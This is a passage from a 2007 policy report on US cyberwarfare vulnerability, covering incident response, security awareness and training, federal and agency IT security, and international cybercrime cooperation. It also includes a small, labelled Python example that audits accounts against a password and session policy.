
Policy Option 6.6.1: Create a more forceful and concentrated effort to prosecute cyber-criminals to the full extent of the damage they caused. It is dangerous to allow criminals who have caused millions of dollars in damage to access computer systems again after only a few years of imprisonment. Additionally, minimum and maximum sentences need to be increased to reflect the widespread damages caused by cyber-attacks.

6.6.2 National Cyberspace Response System

The National Cyberspace Response System is the federal government’s current method of analyzing and responding to cyber-attacks that occur against United States citizens and the government. Analysis of an attack, warning, incident management, and response and recovery from an attack are the four primary steps used by the National Cyberspace Response System. It also includes governmental and nongovernmental information sharing and analysis centers such as MS-ISACs.

National Cyberspace Response System Structure

Figure 6.3 National Cyberspace Security Response System 210

210 "Priority I". National Strategy to Secure Cyberspace. Feb. 2003. US Government. <http://www.whitehouse.gov/pcipb/policy_and_principles.pdf>.

Analysis

The analysis of cyber-attacks is essential for preparing the nation to handle effects caused by cyber-warfare. Through careful evaluation of incidents, inductive inferences can be made to warn and organize stakeholders about future attacks. Also, constant assessment of vulnerabilities can show what area an attacker may be most likely to damage.

Warning

The National Cyberspace Security Response System finds it critical to communicate warnings to vital areas that would be affected by a nation-wide cyber-attack. A bulletin board that not only describes incidents but also suggests unnoticed vulnerabilities is currently being used as a method of communication by US-CERT.

Incident Management

US-CERT currently has in place a method for reporting and classifying incidents. Anyone with access to the Internet can review this information and ask to be alerted if any critical incidents are found.

Response/Recovery

The National Cyberspace Security Response System notes that the OMB, via FISMA, requires federal agencies to take responsibility for noticing and recovering from cyber-attacks.211

6.6.3 Public and Private Ways to Communicate

The federal government has taken an initiative to communicate with the private sector, as seen in the Blue Cascades II and Purple Crescent II projects. These regional exercises took place in Seattle, WA and New Orleans, LA in order to assess the cyber-readiness of individuals and businesses. Both Blue Cascades II and Purple Crescent II brought together more than 200 government and private sector officials to analyze response procedures to cyber-attacks, and to emphasize the importance of cyber security in critical infrastructure protection.212 These exercises also allowed discussion on ways to integrate physical security and cyber security. The brief success of these exercises suggests that more training programs would benefit the private sector in its efforts to secure its cyber-space.

211 "Priority I". National Strategy to Secure Cyberspace. Feb. 2003. US Government. <http://www.whitehouse.gov/pcipb/policy_and_principles.pdf>.
212 "Fact Sheet: Protecting America’s Critical Infrastructure – Cyber Security." US-CERT. Department of Homeland Security. <http://www.us-cert.gov/press_room/050215cybersec.html>.

6.6.4 Sharing Information

The federal government has taken some initiative in sharing information, as seen in US-CERT. Inter-agency communication has become standardized and flows easily.213 Many companies and private sectors do not feel as though there is an adequate portal to relay information related to cyber-attacks. In addition, many companies feel that a publicized vulnerability within their system may negatively affect the success of their business. Confidentiality, therefore, is a significant attribute that must be included in securing the nation against cyber-attacks.

Even though exercises have been done to emphasize its importance, it is still difficult to integrate public and private communication effectively. A reevaluation of the motivations for the private sector to partake in securing against and responding to cyber-attacks may help clarify why communication has been unproductive between the government and its citizens. Due to the variability of cyber-attacks, it is not suggested to incorporate a law that would make it mandatory for businesses to secure their networks to one specific standard. Because of the constantly changing methods of cyber-attacks, a law mandating network security may not ensure that systems are fully protected against all cyber-attacks.

6.6.5 Policy Options

The stakeholders involved in policies regarding the response to cyber-attacks include large businesses, critical infrastructures, and the US government. Below are several policy options that have not been fully enacted. While several Federal agencies have been funded to create systems which respond effectively to cyber-attacks, these agencies are still not established as a reputable source of action against cyber-criminals. It has also been noted that the prosecution of cyber-criminals is much more powerful against disgruntled employees than against orchestrated efforts to attack the government’s computers. Response, therefore, must work with policy options from other divisions such as raising awareness of cyber-incidents and international cooperation.

Policy Option 6.6.2: Apply a more concrete method of analyzing cyber-attacks in such a way that a general audience is able to comprehend. This will be useful in enhancing the quality of communication between the government and its citizens.

Policy Option 6.6.3: Allow incentives for the private sector in its own attempts to secure its networks. Due to the lack of profit directly resulting from securing their cyber-space, private companies do not see the benefit in taking the initiative to prevent cyber-attacks on their own systems. If the government were to provide incentives or prominent recognition for companies who successfully work to secure themselves, the private sector would be more likely to conform to the government’s view of cyber-security.

Policy Option 6.6.4: Attempt to increase communication not only with home users and small businesses, but also with other nations. A better response to cyber-attacks is dependent on increased communication and analysis of attack trends. Opening up an international dialogue related to cyber-attacks could prepare the US government and citizens for possible future attacks.

213 "Government Collaboration Groups and Efforts." US-CERT. Department of Homeland Security. <http://www.us-cert.gov/federal/collaboration.html>.

Policy Option 6.6.5: Establish a network in which local police and firefighters are able to coordinate effective response systems regarding local cyber-attacks. For example, provide a hotline that businesses and computer users can access in case of a cyber-attack. The difficulty with this policy is finding a way to communicate in case telecommunications were disrupted as well. Perhaps the most reliable method is to create a useful two-way radio link between departments that could also be accessed by heads of Information Technology departments at companies.

6.7 Policies to Promote Cyber-security Awareness and Training

The awareness and training policy priority described in the NSSC has two components: increasing all computer users’ awareness of secure computer usage and ensuring that the IT professionals who design and maintain large computer systems receive cyber-security training. According to the NSSC, programs to address these two issues should target four stakeholder areas: home and small business users, large enterprises, critical sectors and infrastructures, and the nation as a whole.214 While programs have been established to address concerns in each of these stakeholder areas, their level of success has been mixed.

6.7.1 Policies for Home and Small Business Users

Several government programs are in place to inform home and small business users of the security risks associated with daily computer use, and how to protect themselves against that risk.

US-CERT maintains two email bulletins, one to distribute security tips and the other to distribute security alerts. The security tips inform readers of everyday security practices such as maintaining privacy on the Internet, while the security alerts “provide timely information about current security problems” so the reader can protect their “home or small business computer.”215 However, it isn’t clear that any concerted efforts have been made to popularize or advertise these email bulletins, and no statistics on their subscription numbers were readily available.

The Department of Homeland Security’s National Cyber Security Division organizes an annual Cyber Security Awareness Month each October, a joint effort with numerous public and private sector organizations. As part of Cyber Security Awareness Month, the N.C.S.D. sponsors several conventions, conferences and other events each day.216 Most of the events take place at universities, and this year’s theme was “Protect Yourself Before You Connect Yourself.”217

214 “Priority III.” The National Strategy to Secure Cyberspace. February 2003: 37-41. 23 Oct. 2007 <http://www.whitehouse.gov/pcipb/priority_3.pdf>
215 US-CERT, National Cyber Alert System. Retrieved October 25, 2007, from US-CERT Web site: http://www.us-cert.gov/referral_pg/

Also, the National Cyber Security Alliance has created Stay Safe Online, a website to inform the general public of how to use computers safely.218 The site is extensive and includes many articles and exercises, such as a test to determine how safe a computer user is from cyber-attacks and tips for protecting a small business. The site is divided into sections targeting educators, families and children, and small businesses. It could be of great use, but it evidently has not been advertised heavily enough, as its current level of daily traffic places it outside of the one million most visited websites.219

Policy Option 6.7.1: Increase advertisement funding for the federally-managed websites and email lists described above. These websites have the potential to increase public awareness, but are not receiving the traffic needed to make an impact.220 Advertising them more vigorously would improve their public exposure.

Policy Option 6.7.2: Create greater incentives for small businesses to inform their employees of cyber-security concerns. For example, small businesses could receive tax credits if a certain percentage of their employees subscribe to US-CERT’s e-mail bulletins or undergo an educational training course on cyber-security. Much of the Stay Safe Online website’s content could be used for such a course.

6.7.2 Policies for Large Enterprises

There are fewer federal programs designed to inform large enterprises. However, one of the largest sources of vulnerabilities in large enterprises comes from the Internet usage of individual employees, so some of the programs described above also apply to large enterprises. The US-CERT cyber-alert email bulletin and Cyber Security Awareness Month are two such programs. Some companies sponsor Cyber Security Awareness Month programs to educate their employees, and in 2007 the month’s schedule included several events related to enterprise-level security, such as one forum on “Best Practices for Managing IT Security and Compliance”.221

Recent polling data is mixed on whether enterprises are aware of the risk created by poor cyber-security. One IBM study from 2006 showed that 75 percent of corporate IT managers are wary of the risk of cyber-attacks from within the company.222 On the other hand, a 2004 USA Today poll indicated that 40 percent of companies were not notifying anyone after a cyber-attack occurred, which indicates a lack of attention to the most basic security procedures.223 This suggests enterprise-level awareness is an area where more federal resources are needed, because many corporate IT managers still do not fully consider the importance of cyber-security.

216 National Cyber-Security Alliance (2007): National Cyber Security Awareness Month 2007 Calendar of Events. Retrieved October 30, 2007, from Stay Safe Online. Web site: http://www.staysafeonline.org/events/index.html
217 US-CERT, (2007). October is National Cyber Security Awareness Month. Retrieved November 3, 2007, from US-CERT Web site: http://www.us-cert.gov/press_room/ncsamonth.html
218 National Cyber Security Alliance: Stay Safe Online. Retrieved October 31, 2007, from Stay Safe Online Web site: http://www.staysafeonline.org/
219 Traffic details for staysafeonline.info. Retrieved November 3, 2007, from Alexa: The Web Information Company. Web site: http://alexa.com/data/details/traffic_details?url=staysafeonline.info
220 Ibid.
221 National Cyber-Security Alliance (2007): National Cyber Security Awareness Month 2007 Calendar of Events. Retrieved October 30, 2007, from Stay Safe Online. Web site: http://www.staysafeonline.org/events/index.html

The priority of training IT professionals is a larger issue for enterprises than for small businesses. Many small businesses have relatively simple computer networks, and are able to rely on

established, industry-standard software and network technologies. Other small businesses

choose to periodically call on technology consulting services to meet their IT needs. Large

enterprises, on the other hand, are more likely to create their own proprietary software systems

and vast, complex internal computer networks. For this reason, large enterprises are more likely

to have their own in-house dedicated IT departments. Policies to encourage cyber-security

training of these IT professionals are lacking and must be developed.

Policy Option 6.7.3: Provide tax incentives for enterprises whose employees undergo

an educational cyber-security course. As in the case of small businesses, this could

be an effective way to increase awareness of secure computing practices among

individual workers.

Policy Option 6.7.4: Work with private industry to create a standardized set of

essential skills for IT professionals in the area of cyber-security, for the purpose of

creating a certification program. If such a standard were created, the IT professionals

responsible for designing and maintaining companies’ internal computer systems

could be trained to meet the program’s requirements and could take a test to become

certified.

6.7.3 Policies for Critical Sectors and Infrastructures

Governmental attempts to increase cyber-security awareness and training within the private

sector entities involved in critical infrastructure sectors have been insufficient. As described

previously, the federal government has enacted mandatory completion of electronic shipping

manifests in some modes of transportation (trucking), and has advertised optional submission of

electronic manifests in others (shipping by water and train). However, the focus has been on

increasing participation, and no attempt has been made to ensure that participating companies are

aware of the added cyber-security risk.

As certain critical infrastructures have been increasingly privatized, some private corporations

have formed alliances to increase training in security issues. One example is Cisco’s Critical

Infrastructure Assurance Group, which trains teams of technical experts who can then assess the

222

Messmer, Ellen (2006, March 14). IBM survey on cybercrime shows IT managers wary. Retrieved November 1,

2007, from Network World. Web site: http://www.networkworld.com/news/2006/031406-ibm-survey-

cybercrime.html 223

Gagnon, B. (2004). Are We Headed For a Cyber-09/11? The American Failure in Cyberstrategy. Conference

Papers -- International Studies Association, Retrieved October 24, 2007, from Academic Search Premier database.

Page 103: Cyberwarfare Vulnerability Assessment (2007)

103

security of various infrastructure-related corporations.224

However, the free markets alone may

not be enough to promote these efforts; the CIAG recently announced it would scale back future

research efforts and growth.225

Policy Option 6.7.5: Accompany existing efforts to encourage electronic submission

of shipping manifests with efforts to encourage safe and secure handling of the

electronic manifest data. An additional option to consider is an incentive program for

companies that implement and document measures taken to secure electronic

shipment manifests and shipment tracking systems.

Policy Option 6.7.6: Make available and widely publicize a national database of

cyber-incidents and attempted cyber-attacks at critical infrastructure components such

as transportation, power, and communication systems. By increasing the public’s

attention to these areas, such a database could add pressure on infrastructure

companies to focus more on their own cyber-security prevention and response.

6.7.4 Policies for the Nation as a Whole

The previously mentioned public awareness policies target specific areas of concern for cyber-

security awareness and training, but there a few other programs designed to increase awareness

across all sectors of the nation. One example is the National Telecommunications and

Information Administration. One organization within the NTIA, the Critical Infrastructure

Protection, has a stated objective to “assist policy makers, industry, and consumers to become

more educated about how to manage risks and protect cyberspace”.226

Policy Option 6.7.7: Increase funding for university-level research of cyber-security

and preparedness measures, and provide funding for universities and community

colleges to create dedicated cyber-security training and research programs. This

could significantly improve the training of America’s future IT workforce.

Policy Option 6.7.8: Create a cyber-warfare threat level indicator system, possibly

similar to the Department of Homeland Security’s color-coded daily threat level

indicator. This sort of indicator system could be used by media outlets to help

publicize the issue of cyber-security, and would increase overall awareness of the

issue across all sectors.

224

Critical Infrastructure Assurance Group Online. Retrieved November 1, 2007, from Security@Cisco Web site:

http://www.cisco.com/web/about/security/security_services/ciag/index.html 225

Heise Security (2007, October 11). Report: Cisco closes down Critical Infrastructure Assurance security research

group. Retrieved November 3, 2007, from Heise Security Web site: http://www.heise-security.co.uk/news/97205 226

NTIA: Critical Infrastructure Protection. Retrieved November 3, 2007, from NTIA Web site:

http://www.ntia.doc.gov/ntiahome/infrastructure

6.8 Government Cyber-security

In addition to working nationally to secure cyberspace, the government must take the lead in securing its own networks. The federal government is responsible for a variety of critical institutions including the military, taxes and social services, emergency services, and financial and banking institutions. As a keeper of the public trust, the government is required to ensure that all of its internal systems are secured from cyber-attack, and to lead the nation by example. The efforts of the federal government to secure itself from cyber-warfare can then be carried over to state and local governments, and serve as a model for private efforts. Through recent reforms, the government has adopted a uniform policy on securing cyberspace, which is largely thorough except for a few areas.

6.8.1 Federal Level Security

In 2002, the Office of Management and Budget (OMB) released an assessment of the relative strengths and vulnerabilities of the security of individual systems in the government. It identified six areas needing improvement: lack of senior management attention, lack of performance monitoring, poor security education and awareness, failure to integrate security into capital investment planning, lack of contractor oversight, and failure to detect and report vulnerabilities.[227] Unfortunately, these deficiencies had been identified as weaknesses for the previous six years (1996-2002) with no policy for improvement. In order to resolve these weaknesses, the OMB established federal guidelines for the oversight of individual agencies. Using a defined minimum level of security, the OMB is now able to ensure that any future IT systems have been analyzed and patched for security weaknesses, as well as to track progress in fixing existing vulnerabilities. This provides a government-wide IT standard that was previously missing.[228]

The current administration has sought to remedy security weaknesses primarily through funding restrictions. Before systems can be funded by the OMB, the department must show that any IT weaknesses within the system have been addressed. As a result, security is a top priority for any system upgrades or investments, and a baseline of security is achieved.[229] Additionally, the lifecycle costs for security are required to be identified and integrated as part of submitted budgets. Failure to integrate these costs, or to remedy identified weaknesses, results in a complete rejection of the entire system upgrade.

Additional areas of concern include government wireless networks and user authentication. Wireless networks are of special concern, as they are often easy to breach and often unsecured. Data transferred wirelessly can be intercepted, presenting the risk of data theft. Agencies must ensure that their networks are secured, check for any unauthorized access, and report any security breaches.[230] User authentication also presents a security threat, although one that is relatively easy to counteract.

227. “Priority IV.” The National Strategy to Secure Cyberspace. February 2003. 30 Oct. 2007 <http://www.whitehouse.gov/pcipb/priority_4.pdf>
228. Ibid.
229. Ibid.

Policy Option 6.8.1: Mandate user password complexity and frequent changes, log-outs after a short period of inactivity, and secondary identification (in the form of ID cards required to operate the computer).
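The three controls in Policy Option 6.8.1 are checkable from account metadata alone. The following is an added example, not from the 2007 report: it audits a constructed set of accounts for stale passwords, idle sessions that were never logged out, and workstations that do not require an ID card. The thresholds (90-day maximum password age, 15-minute idle timeout, 12-character minimum), the Account fields, and the sample accounts are all assumptions made for illustration; the report mandates the controls but sets no numbers.

```python
# Added example, not part of the 2007 report: an audit of user accounts against
# the three controls named in Policy Option 6.8.1. The thresholds, the Account
# fields and the sample accounts are assumptions constructed for illustration.
from dataclasses import dataclass
from datetime import datetime, timedelta

# Assumed thresholds; the policy option mandates the controls but sets no numbers.
MAX_PASSWORD_AGE = timedelta(days=90)   # "frequent changes"
IDLE_TIMEOUT = timedelta(minutes=15)    # "log-outs after a short period of inactivity"
MIN_LENGTH = 12                         # part of the assumed complexity rule


@dataclass
class Account:
    user: str
    password_set: datetime   # when the current password was last changed
    last_activity: datetime  # last user input on the current session
    session_open: bool       # is a session currently logged in
    card_required: bool      # must an ID card be present to use the computer


def password_complex(pw: str) -> bool:
    """Assumed complexity rule: minimum length and at least three of the four
    character classes. Apply this when a password is set; the audit below never
    sees passwords, only metadata, because stored passwords should be hashed."""
    classes = (
        any(c.islower() for c in pw),
        any(c.isupper() for c in pw),
        any(c.isdigit() for c in pw),
        any(not c.isalnum() for c in pw),
    )
    return len(pw) >= MIN_LENGTH and sum(classes) >= 3


def audit(accounts, now):
    """Return {user: [violations]} for every account that breaks the policy.
    A closed session cannot be idle, so the timeout check only applies to open ones."""
    findings = {}
    for a in accounts:
        violations = []
        if now - a.password_set > MAX_PASSWORD_AGE:
            violations.append("password older than max age")
        if a.session_open and now - a.last_activity > IDLE_TIMEOUT:
            violations.append("idle session not logged out")
        if not a.card_required:
            violations.append("no secondary identification")
        if violations:
            findings[a.user] = violations
    return findings


# Constructed sample data (the report's publication date is used as "now").
NOW = datetime(2007, 12, 5, 12, 0)
SAMPLE_ACCOUNTS = [
    Account("alice", NOW - timedelta(days=30), NOW - timedelta(minutes=2), True, True),
    Account("bob", NOW - timedelta(days=120), NOW - timedelta(minutes=40), True, False),
    Account("carol", NOW - timedelta(days=10), NOW - timedelta(hours=3), False, True),
]

if __name__ == "__main__":
    for user, problems in audit(SAMPLE_ACCOUNTS, NOW).items():
        print(user, "->", "; ".join(problems))
```

Complexity is deliberately checked only at the moment a password is chosen: an audit of existing accounts should work from timestamps and flags, never from recoverable passwords, so a stale-password finding is the only complexity-related signal the audit can raise after the fact.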

6.8.2 Agency Level Security

Although the OMB has established a baseline for monitoring and grading IT threats and vulnerabilities across the government, it is vital to have a process for each agency to reach the desired level of security. Agencies must document and define their system structure, continuously assess threats and vulnerabilities, and enact security controls and install any security patches.

The first step, identifying and documenting the system structure, primarily assesses the security of each agency. Included is the current status of all parts of the system and their security level, as well as any interaction with other agencies in the government. This inventory and assessment of system processes as a whole offers a view of the current state of government security. The agencies will then receive funding to remedy any weaknesses and to bring the entire government system up to a baseline level. Additionally, updated systems can allow IT personnel to easily modify and secure computers agency-wide.[231]

Second, each agency must stay aware of any new threats or vulnerabilities in its systems. Through auditing systems, each agency will monitor computer usage and determine the effectiveness of control mechanisms, such as restricted website access. Additionally, the control mechanism will allow the agency to update the security of its system as threats are identified by the federal government. Through measuring the effectiveness of the security systems, as well as centralized control over updates and patches, agencies can work to meet government-wide standards for security.

Finally, the agencies must act on any findings they might have. Security patches must be installed, as many viruses exploit known programming flaws for which fixes are often already available. Through control systems, risk can be widely mitigated, and with constant assessment of existing programs as well as future programs, vulnerabilities can be remedied.

Policy Option 6.8.2: IT departments should be required to submit system structure documents, detailing the systems used throughout their agency. Departments should institute a government-wide internet control program to restrict potentially threatening website access. Additionally, they must show prompt response and 100% implementation of security patches for their systems.

230. Ibid.
231. Ibid.

Following the earlier discussion of the vulnerabilities in the FAA, the following pair of policy options is specific to the FAA, but could form a model for other governmental agencies.

Policy Option 6.8.3: Mandate that the future development of the FAA's air traffic control system continue to favor decentralized, redundant regional control centers. This will ensure that it remains impractical for a cyber-attack to disable the air traffic system on a nationwide level. One possibility is to make backup computer systems run in parallel with the main systems, but with a different implementation (e.g. a different hardware configuration or operating system), so that a vulnerability exploited on the main system may not affect the backup.

Policy Option 6.8.4: Require that the FAA (or other government agencies) limit outside IT contractors' access to the computer systems they are directly involved with. As discussed previously in Section 3.4.3.2, contractors are currently given full access to systems that are not relevant to their work assignments. This simple measure would limit the risk of an outside contractor inserting malicious code into the agency's computer systems, and remove one vulnerability from the air traffic control system.

6.8.3 Areas for Improvement

Although the preceding sections of government policy are adequate to address security issues, there are two main areas in need of improvement. First is the oversight and security of contractors, an issue identified by the OMB. Second is the lack of a uniform testing procedure.

Many skeptics of cyber-warfare suggest that the knowledge needed to penetrate systems and wreak havoc is so advanced that only those inside an agency could perpetrate an attack. However, these skeptics fail to realize that a significant portion of cyber-attacks come from within an organization. Due to the nature of the government and the costs of labor, large portions of work are outsourced to contractors or depend upon private corporations for security solutions. Currently there is no effective plan for oversight of government contractors, and management gives little attention or support to IT functions. The government needs to establish a procedure to evaluate outside contractors to ensure quality and secure technical assistance, or hire professionals for in-house IT departments. Additionally, government agencies need to work together to exercise their buying power, pressing companies to produce more secure products and as a result raising security standards in private industry.

Additionally, the government needs to put a larger emphasis on testing the security of its systems. Although the military has identified the need for actual testing, the current national policy is devoid of procedures for this type of testing. Returning to historical examples of data theft like Eligible Receiver, the government needs to hire ‘red teams’ from the NSA and private companies to deliberately test and break agency security systems. Without these unique and realistic tests, IT departments can overlook security openings that could lead to a significant cyber incident. However, the government must be cautious to ensure that any ‘red team’ personnel meet security standards and do not use their knowledge against the government.

Policy Option 6.8.5: Use best-value evaluations when selecting outside contractors. The OMB should establish which IT contractors present the best services, and encourage agencies to select the best contractor and not the lowest bid. Additionally, the OMB could establish a certification system for IT contractors to complete and show minimum proficiency.

Policy Option 6.8.6: Require regular ‘red team’ testing of any agency or private corporation that is connected to the government network. The ‘red team’ should be a multi-agency force that has regular turnover to ensure new ideas are constantly applied in security testing.

6.9 US and International Cyber-warfare Collaboration

Over the past decade, international cyber-warfare has become an increasingly prominent subject as attempted attacks on economic and social infrastructures continue to occur. One of the first recorded attempts at international cyber-warfare happened in June of 1999 when a group that called themselves “J18” urged people all over the world to plan individual actions that focused on disrupting “financial centers, banking districts and multinational corporate power bases." The group planned for the actions to coincide with the G8 convention in Cologne, Germany, and suggested that followers either march through the streets or hack into computer systems in protest of capitalism. The group attracted teams of hackers from Indonesia, Israel, Germany, and Canada that eventually attacked at least 20 companies’ computers, including both the Stock Exchange and Barclays. By the end of the protests, more than 10,000 cyber-attacks were recorded over a 5-hour period.[232]

With America highly interconnected to the rest of the world, we must be prepared to prevent and respond to any international cyber-attack in an effective manner. This response, however, is complicated by the difficulty of distinguishing between cyber-warfare, terrorism, and crime, and of determining appropriate responses across and through foreign borders. Systems supporting our national defense, intelligence community, and critical infrastructures “must be secure, reliable, and resilient – able to withstand attack regardless of the origin of attack.”[233] Therefore, America’s policy should focus on securing our own systems from international attacks, and on developing a cyber-warfare policy between ourselves and other nations.

6.9.1 United States National Security Policies

America should be concerned with two distinct forms of cyber-warfare: espionage and attacks on infrastructure. In the former, nations or terrorist groups may attempt to steal crucial documents during peacetime from the government, private companies, and university research centers about information systems and key target locations, as well as “lace our infrastructure with ‘back doors’ and other means of access” designed for future use.[234] On the other end of the spectrum, during wartime our adversaries can potentially attack critical infrastructures in order to intimidate and erode public confidence in information systems.[235] They could also attack the Department of Defense (DoD) and the intelligence community in an attempt to slow the U.S. military response. Due to such a wide range of possible attacks, the U.S. government stated that it must be able to protect infrastructures that are considered “national security assets.” It also believes that we must develop the capability to quickly identify the attackers.[236] The following outlines the policies needed to fulfill these goals.

232. Denning, Dorothy. "Activism, Hacktivism, and Cyberterrorism: The Internet as a Tool for Influencing Foreign Policy." Internet and International Systems. December 1999: 101-120. 28 Oct. 2007 <http://www.nautilus.org/gps/info-policy/workshop/papers/denning.html>
233. “Priority V.” The National Strategy to Secure Cyberspace. February 2003: 49. 23 Oct. 2007 <http://www.whitehouse.gov/pcipb/priority_5.pdf>

6.9.1.1 Securing the Nation’s Cyberspace

One of the largest problems that our nation faces today in attempting to secure cyberspace is data mining and intelligence collection directed against the United States government, critical infrastructure companies, and educational research facilities. To date, almost no true counterintelligence technologies have been developed. Therefore, the United States must first work to better understand our enemies’ capabilities, and in turn the FBI and intelligence community will be able to develop and implement stronger forms of counterintelligence.[237]

In addition to working with underdeveloped counterintelligence abilities, the Department of Defense, intelligence community, and law enforcement agencies are unable to quickly trace the source of a cyber-attack, assuming that the person or group can be traced at all. Therefore, the government should work to promote better attribution technologies so that the previously listed groups are able to easily and quickly identify the culprit and take action if necessary. Preventative techniques are also lacking and must be better developed in order to protect critical systems and infrastructures.[238]

Although the DHS has created several agencies for incident reporting and interagency communication, reports of cyber-attacks still fail to reach the proper agencies. Therefore, the United States must develop a better network and system for distributing reported incidents throughout the various defense, law enforcement, and national security agencies depending on the nature of the cyber-attack. The National Security Council and the Office of Homeland Security are leading research to ensure that the proper technologies and procedures are in place so that reports of these attacks can easily be routed to the proper agency.[239]

234. “Priority V.” The National Strategy to Secure Cyberspace. February 2003: 50. 23 Oct. 2007 <http://www.whitehouse.gov/pcipb/priority_5.pdf>
235. Ibid.
236. Ibid.
237. Ibid.
238. “Priority V.” The National Strategy to Secure Cyberspace. February 2003: 50. 23 Oct. 2007 <http://www.whitehouse.gov/pcipb/priority_5.pdf>
239. Ibid.

6.9.2 United States International Policies

Not only must America work towards improving our own security and detection systems, but it will also need to work with nations all over the world in order to secure the global cyberspace and economy. To date, relatively little has been done to globally advance the idea that all nations should work together to secure our world market. The policies and general plans to accomplish international security are outlined below:

6.9.2.1 Utilize International Organizations to Promote a Global “Culture of Security”

Because our nation’s infrastructure is directly linked with Asia, Canada, Europe, Mexico, and South America, the United States has a vested interest in securing global cyberspace. The global economy increasingly depends on the vast information networks that connect markets and multinational corporations. Because the world is becoming so interconnected, America needs to push for a global “culture of security” in order to protect every nation’s international economy. Countries must work together for this goal, because “the vast majority of cyber-attacks originates or passes through systems abroad, crosses several borders, and requires international investigative cooperation to be stopped.”[240]

Because of the international participation needed to fulfill this goal, the United States is determined to work with other nations to help raise awareness, share ideas and defense technologies, and prosecute all who engage in cyber-crimes in order to maintain the highest level of integrity within global information networks. Up to this point in American cyber-warfare policies, the government has worked with public international organizations such as the Organization for Economic Cooperation and Development (OECD), the G-8, the Asia Pacific Economic Cooperation forum (APEC), and the Organization of American States (OAS). The government has also worked with organizations in order to help coordination within the private sector, such as the Transatlantic Business Dialogue.[241]

6.9.2.2 Develop Secure Networks

In order to develop secure networks, the United States urges that international technical standards for these systems be developed and adopted so that every nation has a base level of security. In turn, this baseline would make the entire global market and information systems more secure. The government will also facilitate collaboration and research between the world’s top scientists and researchers. Additionally, the government will encourage American industries to engage with their foreign counterparts in an attempt to both make a business case for cyber-security and develop a plan for successful partnerships with governments.[242]

240. “Priority V.” The National Strategy to Secure Cyberspace. February 2003: 51. 23 Oct. 2007 <http://www.whitehouse.gov/pcipb/priority_5.pdf>
241. “Priority V.” The National Strategy to Secure Cyberspace. February 2003: 51. 23 Oct. 2007 <http://www.whitehouse.gov/pcipb/priority_5.pdf>
242. Ibid.

Page 110: Cyberwarfare Vulnerability Assessment (2007)

110

6.9.2.3 Promote North American Cyberspace Security

Although global cyber-security is a high priority in this field, the United States must first secure

North American cyber-assets before focusing on the rest of the world. Therefore, the

government should look to cooperate with Canada and Mexico in order to form a strong “Safe

Cyber Zone.” This zone will be accomplished by identifying all networks that the three

countries share and solving the security issues that exist between the borders.243 In turn, the “Safe

Cyber Zone” will provide for a strong defense system no matter where an attack originates.

6.9.2.4 Establish International Network of Agencies for Information Relay

The United States encourages all nations to appoint a single organization that will inform

governments and public all over the world of cyber-attacks or viruses. The U.S. government also

calls for larger organizations, such as the European Union, to create information hierarchies. By

creating such a network, the increased amount of information being shared about these attacks

will make defense research easier. Another way in which an international communications

network could improve both defense and defense research is if each country were to develop a

system that would automatically inform its government agencies, the public, and other nations

about impending cyber-attacks or viruses. 244

6.9.2.5 Encourage Other Nations to Follow the Council of Europe Convention on Cyber-crime

The United States has signed and put into effect the Council of Europe Convention on Cyber-

crime (described below), and encourages other nations to both sign and abide by the treaty, in

turn helping other nations find and prosecute the criminal offenders.245

6.9.3 International Cyber-security Collaboration

In November of 2001, the Council of Europe held the Convention on Cyber-crime in which a

treaty was completed and signed by 39 European countries, as well as Canada, Japan, South

Africa, and the United States. The treaty establishes that all countries part of the collaboration

will work together in order to help investigate any cyber-crime that may be coming from one’s

respective country, similar to the American policy outlined above. This can be seen in the treaty

when it says, “Believing that an effective fight against cyber-crime requires increased, rapid and

well-functioning international co-operation in criminal matters.”246 The treaty continues this idea

243

“Priority V.” The National Strategy to Secure Cyberspace. February 2003: 51. 23 Oct. 2007

<http://www.whitehouse.gov/pcipb/priority_5.pdf> 244

Ibid. 245

Ibid. 246

Convention on Cybercrime. Council of Europe. 23 Nov. 2001

<http://conventions.coe.int/Treaty/Commun/QueVoulezVous.asp?NT=185&CL=ENG>

Page 111: Cyberwarfare Vulnerability Assessment (2007)

111

of cooperation by establishing the idea that legitimate interests in information technologies

should be protected when cooperating with other nation states. In other words, all nations should

respect the distinction between private and public information, allowing defense companies who

are developing new cyber-warfare technologies the opportunity to succeed by selling the

products instead of having the information leaked to the public.

The United States initially signed this document in November of 2001, when it was first written.

However, it has just been ratified and put into effect within the past year. 247 Therefore, the

government should strive to use and enforce the policies agreed upon in the document so that

global cyber-security and international prosecution of criminals both improve.

6.9.4 International Policies

Although no explicit cyber-warfare policies have been found for other nations, we have an idea

of how some view the use of the internet as a weapon. Some countries, such as the United

Kingdom and Germany, have relatively similar views as the United States. However, others’

ideas such as Russia and China differ from our nation’s policies in retaliation efforts and future

military practices, respectively.

6.9.4.1 United Kingdom

The United Kingdom has very similar views to the United States in regards to cyber-warfare

policy. They believe cyber-warfare to be actions that affect others’ information systems in

support of national objectives. Also included in their definition of cyber-warfare is the defense

of one’s own infrastructure and systems via the internet. The UK is even a step ahead the United

States government in the sense that they are using legal framework that already exists that they

believe can be applied to cyberspace attacks. In other words, the British are now treating any

cyber-attack on a person or company as a crime that is prosecutable if the culprit is found. In

order to help find attackers, the Regulation of Investigatory Powers Act 2000 (RIP) was created

to allow the government to intercept and read e-mail, as well as force someone to decrypt

personal files. The British believe that this will help “combat the threat posed by rising criminal

use of strong encryption,” and have even promised that the program will not get out of hand due

to an independent overseer of the powers of RIP. 248

6.9.4.2 Germany

In general, the German perspective on cyber-warfare policy is similar to that of the United States and the United Kingdom. However, the Germans do have a couple of ideas that differ from American policy. The first of these considers the management of the media as “an element of information warfare.” This means that if anyone were to try to control any form of German media, it would be seen as an act of war against the country. Also, due to a reported case of industrial espionage by the French that cost the German economy significant losses, their government is considering the use of economic cyber-warfare as a means of keeping enemies on a level playing field.249 This does not mean, however, that they intend to use this as an offensive measure. Instead, it will simply be used while in conflict with another nation as a way to help end the dispute.

247 Ibid.

248 http://www.fas.org/irp/crs/RL30735.pdf

6.9.4.3 Russia

The Russian view of cyber-warfare is drastically different from that of the American government. In fact, many Russians argue that cyber-warfare is the second most dangerous attack, the first being a nuclear attack:

From a military point of view, the use of Information Warfare against Russia or its armed forces will categorically not be considered a non-military phase of a conflict whether there were casualties or not . . . considering the possible catastrophic use of strategic information warfare means by an enemy, whether on economic or state command and control systems, or on the combat potential of the armed forces . . . Russia retains the right to use nuclear weapons first against the means and forces of information warfare, and then against the aggressor state itself.250

